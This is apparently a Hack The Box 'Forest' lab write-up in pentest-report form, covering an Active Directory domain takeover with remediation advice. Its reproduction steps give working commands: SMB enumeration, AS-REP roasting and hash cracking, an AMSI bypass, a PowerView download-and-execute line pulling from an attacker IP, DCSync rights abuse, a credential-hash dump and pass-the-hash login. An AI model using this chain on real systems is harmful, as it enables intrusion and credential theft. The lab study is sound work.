HTB Forest CTF Writeup

HTB Forest CTF Writeup

This assessment on HTB Forest CTF aimed to evaluate the security posture of the Active Directory (AD) environment and associated infrastructure. During the evaluation, several vulnerabilities were identified, ranging from information disclosure and initial access to domain takeover. These issues highlight weaknesses in access control, account configurations, and privilege management. Addressing these vulnerabilities is crucial to preventing unauthorized access, data exfiltration, and domain compromise.

HTB Forest CTF card image
Fig. 01: Forest CTF Card Image

Console color legend:

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Forest CTF

Forest in an easy difficulty Windows Domain Controller (DC), for a domain in which Exchange Server has been installed.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

HTB Forest CTF – Executive Summary

Key Findings

  1. BS01: Information Disclosure via SMB Null Sessions
    Severity: Medium
    Unauthorized users could exploit SMB null sessions to gather sensitive information, including usernames, groups, and machine accounts, narrowing the attack surface for further exploitation.
  2. BS02: Initial Access – ASRepRoasting Vulnerability
    Severity: High
    The “svc-alfresco” account was identified with Kerberos pre-authentication disabled, enabling attackers to retrieve and brute-force credentials offline, thereby gaining unauthorized domain access.
  3. BS03: Domain Takeover via AD Misconfiguration
    Severity: Critical
    Excessive privileges associated with the compromised “svc-alfresco” account enabled privilege escalation and a DCSync attack, leading to complete domain takeover and access to domain administrator credentials.

Recommendations

  1. Harden SMB Configuration

    • Disable SMB null sessions and enforce authentication for all SMB connections.
    • Restrict SMB access to trusted IP addresses through firewall rules and group policies.
  2. Secure Kerberos Configuration

    • Enforce Kerberos pre-authentication for all accounts.
    • Regularly monitor and audit Kerberos authentication attempts for anomalies.
  3. Enforce Principle of Least Privilege

    • Review and minimize group memberships, particularly for service accounts like “svc-alfresco.”
    • Restrict DCSync rights to essential accounts and services only.
  4. Implement Advanced Monitoring and Alerts

    • Enable real-time monitoring of privileged operations such as group membership changes and ACL modifications.
    • Use tools like BloodHound to identify and mitigate AD misconfigurations.

Summary

This assessment uncovered serious vulnerabilities that could allow attackers to gain unauthorized access, escalate privileges, and compromise the Active Directory environment. By addressing these findings through proper configuration, privilege management, and monitoring, the organization can significantly improve its security posture and reduce the risk of domain-wide compromise. Prioritizing the remediation of these issues will ensure a more robust IT infrastructure.

BS01: Information Disclosure – SMB Null Session

Explanation

It’s possible to disclose information about the domain by authenticating using SMB null session. Information may include a list of registered users, computers, groups, and more. This could allow a remote attacker to narrow down the attack surface to just a few valid users.

Severity

Overall: Medium. This vulnerability exposes sensitive domain information through unauthenticated SMB null sessions. While it does not directly compromise systems, the ability to enumerate usernames, groups, and machine accounts provides attackers with a roadmap to target specific accounts or machines. Such information reduces the effort required to escalate an attack. If combined with other vulnerabilities, this issue can significantly increase the likelihood of a successful attack.

Impact: Attackers can narrow their focus to valid accounts, making subsequent attacks like credential brute-forcing or phishing more effective.
Likelihood: Medium – Exploitation requires network access to SMB services, but null sessions are often overlooked in configurations.

Recommendations

  • Disable SMB Null Sessions: Configure the server to require authentication for SMB connections. This can be done by modifying the registry key HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\RestrictNullSessAccess and setting it to 1.
  • Implement Firewall Rules: Restrict access to SMB ports (445 and 139) to trusted IP addresses only.
  • Use GPOs: Enforce network access restrictions through Group Policy to prevent anonymous access to shared resources.

Steps to Reproduce

1. Use NetExec tool to perform a NULL authentication on the smb server

$ nxc smb htb.local -u '' -p '' --users
SMB                      10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB                      10.10.10.161    445    FOREST           [+] htb.local\: 
SMB                      10.10.10.161    445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-
SMB                      10.10.10.161    445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain
SMB                      10.10.10.161    445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB                      10.10.10.161    445    FOREST           krbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account
<SNIP>
SMB                      10.10.10.161    445    FOREST           HealthMailbox0659cc1          2019-09-19 11:57:58 0
SMB                      10.10.10.161    445    FOREST           sebastien                     2019-09-20 00:29:59 615
SMB                      10.10.10.161    445    FOREST           lucinda                       2019-09-20 00:44:13 615
SMB                      10.10.10.161    445    FOREST           svc-alfresco                  2024-11-22 12:27:24 0
SMB                      10.10.10.161    445    FOREST           andy                          2019-09-22 22:44:16 615
SMB                      10.10.10.161    445    FOREST           mark                          2019-09-20 22:57:30 616
SMB                      10.10.10.161    445    FOREST           santi                         2019-09-20 23:02:55 615
SMB                      10.10.10.161    445    FOREST           [*] Enumerated 31 local users: HTB

BS02: Initial Access – ASRepRoasting

Explanation

After obtaining a valid list of usernames, targeted enumeration identified a user (“svc-alfresco”) with Kerberos pre-authentication disabled. This allows an attacker to obtain a hash without credentials and attempt to crack it offline, potentially recovering the original password.

Severity

Overall: High. The “svc-alfresco” account, configured without Kerberos pre-authentication, is vulnerable to ASRepRoasting. This allows an attacker to obtain encrypted credentials without prior access and attempt offline brute-force attacks to recover the plaintext password. Successful exploitation provides an entry point into the domain and access to sensitive resources.

Impact: Attackers gain unauthorized access to domain resources, enabling lateral movement and escalation. This is particularly critical for high-privilege accounts or service accounts with broad access.
Likelihood: High – The exploitation process is straightforward with tools like Impacket and commonly available password cracking resources.

Recommendations

  • Enforce Kerberos Pre-Authentication: Ensure all user accounts have Kerberos pre-authentication enabled. This can be enforced via the Active Directory Users and Computers (ADUC) console or PowerShell.
  • Monitor Authentication Attempts: Implement auditing and monitoring to detect abnormal Kerberos authentication requests or brute-force attempts.
  • Limit Privileges: Minimize privileges for service accounts like “svc-alfresco” to reduce the impact of credential compromise.

Steps to Reproduce

1. Create a users.txt containing just usernames discovered in BS01

users.txt
mark
andy
forest
sebastien
santi
lucinda
svc-alfresco

2. Use impacket-GetNPUsers

$ impacket-GetNPUsers -no-pass -usersfile users.txt htb.local/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User forest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:6b6cdeaed63e05419bfa5f841b5fdd79$e094432f435b28f053b268e023f9d011631f78acd43896021fbf56d8e040bfba3d82c92ce9c20f280b3b2d6da4ad876a017e654d371eb18710cc554fca51d7d86f601b5be07c664f34654e89ebba2c3f2f95b417de890349e5803840aedbcb97fe59ac123391ba7d8271d302256f274d031bd9dffc610fd355daedf996b2a6d675aa71261bb2fd73053118444e09262de8c7d526da786279325cc31f2f81501643b0ab3b6ba2843cd2abe3b288aee6302707c3b114c3b949a4cdcd4ec720019028c25ca65ce8c103839f37531c8c2e56fa265a856594bb6b59f35f5001aa5259fd397144cdc2
3. Copy the hash to "asreproast-alfresco.txt"
[email protected]:6b6cdeaed63e05419bfa5f841b5fdd79$e094432f435b28f053b268e023f9d011631f78acd43896021fbf56d8e040bfba3d82c92ce9c20f280b3b2d6da4ad876a017e654d371eb18710cc554fca51d7d86f601b5be07c664f34654e89ebba2c3f2f95b417de890349e5803840aedbcb97fe59ac123391ba7d8271d302256f274d031bd9dffc610fd355daedf996b2a6d675aa71261bb2fd73053118444e09262de8c7d526da786279325cc31f2f81501643b0ab3b6ba2843cd2abe3b288aee6302707c3b114c3b949a4cdcd4ec720019028c25ca65ce8c103839f37531c8c2e56fa265a856594bb6b59f35f5001aa5259fd397144cdc2

4. Run hashcat with rockyou.txt wordlist to recover the original password

$ hashcat asreproast-alfresco.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

<SNIP>

[email protected]:6b6cdeaed63e05419bfa5f841b5fdd79$e094432f435b28f053b268e023f9d011631f78acd43896021fbf56d8e040bfba3d82c92ce9c20f280b3b2d6da4ad876a017e654d371eb18710cc554fca51d7d86f601b5be07c664f34654e89ebba2c3f2f95b417de890349e5803840aedbcb97fe59ac123391ba7d8271d302256f274d031bd9dffc610fd355daedf996b2a6d675aa71261bb2fd73053118444e09262de8c7d526da786279325cc31f2f81501643b0ab3b6ba2843cd2abe3b288aee6302707c3b114c3b949a4cdcd4ec720019028c25ca65ce8c103839f37531c8c2e56fa265a856594bb6b59f35f5001aa5259fd397144cdc2:s3rvice
                                                        
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:6b6cdeaed63e05...44cdc2
Time.Started.....: Fri Nov 22 13:04:48 2024 (5 secs)
Time.Estimated...: Fri Nov 22 13:04:53 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   869.6 kH/s (0.79ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4084736/14344385 (28.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s456822 -> s3r3ndipit
Hardware.Mon.#1..: Util: 68%
5. We could use bloodhound-python and ingest the data into Bloodhound to enumerate the domain at this point:
$ bloodhound-python -c All -d htb.local -gc forest.htb.local -u 'svc-alfresco' -p 's3rvice'
$ sudo neo4j start
$ bloodhound
After ingesting the data and marking "svc-alfresco" user as owned, we can go to "Analysis" > "Shortest Path from Owned Principals" and can see that the group "PrivilegedITAccounts" has "CanPSRemote" over the machine.
Fig. 02: Bloodhound panel, showcasing CanPSRemote attribute

6. Use evil-winrm to connect to the machine: evil-winrm -i htb.local -u svc-alfresco -p s3rvice

BS03: Domain Takeover – AD Misconfiguration

Explanation

The compromised “svc-alfresco” account, due to its nested group memberships, could escalate privileges by abusing WriteDacl rights over the domain. This allowed for the creation of a DCSync attack, ultimately granting domain administrator privileges.

Severity

Overall: Critical. The compromised “svc-alfresco” account’s misconfigured privileges and nested group memberships allow an attacker to escalate privileges, perform a DCSync attack, and extract domain administrator credentials. This leads to full domain compromise, granting an attacker complete control over the Active Directory environment and the ability to manipulate, exfiltrate, or destroy critical data.

Impact: This vulnerability represents the highest level of risk to the organization. Domain administrator access enables complete control over all systems within the domain, potentially resulting in catastrophic operational, financial, and reputational damage.
Likelihood: High – Misconfigurations in privilege assignments and group memberships are common in AD environments, and tools like BloodHound make exploitation accessible to attackers with domain access.

Recommendations

  • Review Group Memberships: Regularly audit nested group memberships to ensure accounts like “svc-alfresco” do not inadvertently have elevated permissions.
  • Restrict DCSync Rights: Limit the Replicating Directory Changes permission to only trusted accounts and services.
  • Monitor Privileged Operations: Set up alerts for changes to critical groups (e.g., “Domain Admins”) and permissions (e.g., WriteDacl).
  • Apply the Principle of Least Privilege: Ensure service accounts are granted only the permissions necessary for their specific role.

Images

Fig. 03: Bloodhound panel, showcasing attack path towards HTB.LOCAL domain
Fig. 04: Bloodhound panel, showcasing nested group membership for user "svc-alfresco"

Steps to Reproduce

1. In your attacking machine, download PowerView.ps1

2. Set up a python webserver the same directory PowerView is located: python3 -m http.server 80

3. Import powerview into your evil-winrm session by running the following commands (replacing 10.10.14.8 with your actual TUN0 IP address)

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

iex(New-Object Net.Webclient).DownloadString('http://10.10.14.8/PowerView.ps1')

4. Execute this powershell one-liner script:

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'htb.local\domain admins' -Rights DCSync

5. Perform a DCSync using Impacket

$ sudo impacket-secretsdump svc-alfresco:[email protected]
[sudo] password for kali: 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:7d2b45b5e85821dd16dda0a0897195fa:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
ATTACKERSYSTEM$:10601:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
<SNIP>
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
FOREST$:aes256-cts-hmac-sha1-96:285bb03dd1d1b2015540513477f9ccc42f86a3153cc8d20bdaff945c4bc41c0a
FOREST$:aes128-cts-hmac-sha1-96:74d6ea6232109ddbb6f67f053fc343c8
FOREST$:des-cbc-md5:feec85c7083ecd25
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

6. Log in as Administrator using its NTLM password hash: evil-winrm -i htb.local -u 'Administrator' -H 32693b11e6aa90eb43d32c72a07ceea6


Details

Here's a step-by-step explanation of what the powershell script on item 4 does:

1. Adding a Domain Group Member

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco
  • Add-DomainGroupMember: This adds a specified user or group to an existing AD group.

  • -Identity 'Exchange Windows Permissions': The target group is Exchange Windows Permissions.

  • -Members svc-alfresco: The member being added is the svc-alfresco user.

This step adds the svc-alfresco account to the Exchange Windows Permissions group, which often has elevated permissions in the domain.

2. Setting Up Credentials

$username = "htb\svc-alfresco"
$password = "s3rvice"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
  • $username and $password: Specifies the credentials for the svc-alfresco account (htb\svc-alfresco with the password s3rvice).

  • Secure String:

    • New-Object -TypeName System.Security.SecureString: Creates a secure string object for the password.

    • $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}: Converts the plaintext password to a secure format by appending each character.

This step prepares credentials in a secure format for the subsequent command.

3. Adding a Domain ACL

Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
  • Add-DomainObjectAcl: Modifies access control lists (ACLs) for AD objects.

  • -Credential $Cred: Uses the credentials for svc-alfresco to authenticate the action.

  • -PrincipalIdentity 'svc-alfresco': Specifies the principal (user or group) whose permissions are being modified, here svc-alfresco.

  • -TargetIdentity 'HTB.LOCAL\Domain Admins': The target object is the Domain Admins group in the HTB.LOCAL domain.

  • -Rights DCSync: Grants the DCSync right, which allows the principal to simulate a domain controller and request password hashes for users in the domain.

This step grants svc-alfresco the DCSync right, a permission that can be used to replicate directory data, including password hashes, from the domain controller.

Conclusion

This penetration testing assessment identified several critical vulnerabilities within the Active Directory (AD) environment and associated infrastructure, underscoring significant gaps in configuration, privilege management, and monitoring practices. Addressing these vulnerabilities is essential to mitigating risks of unauthorized access, lateral movement, and domain compromise.

We hope you have found our content on HTB Forest CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top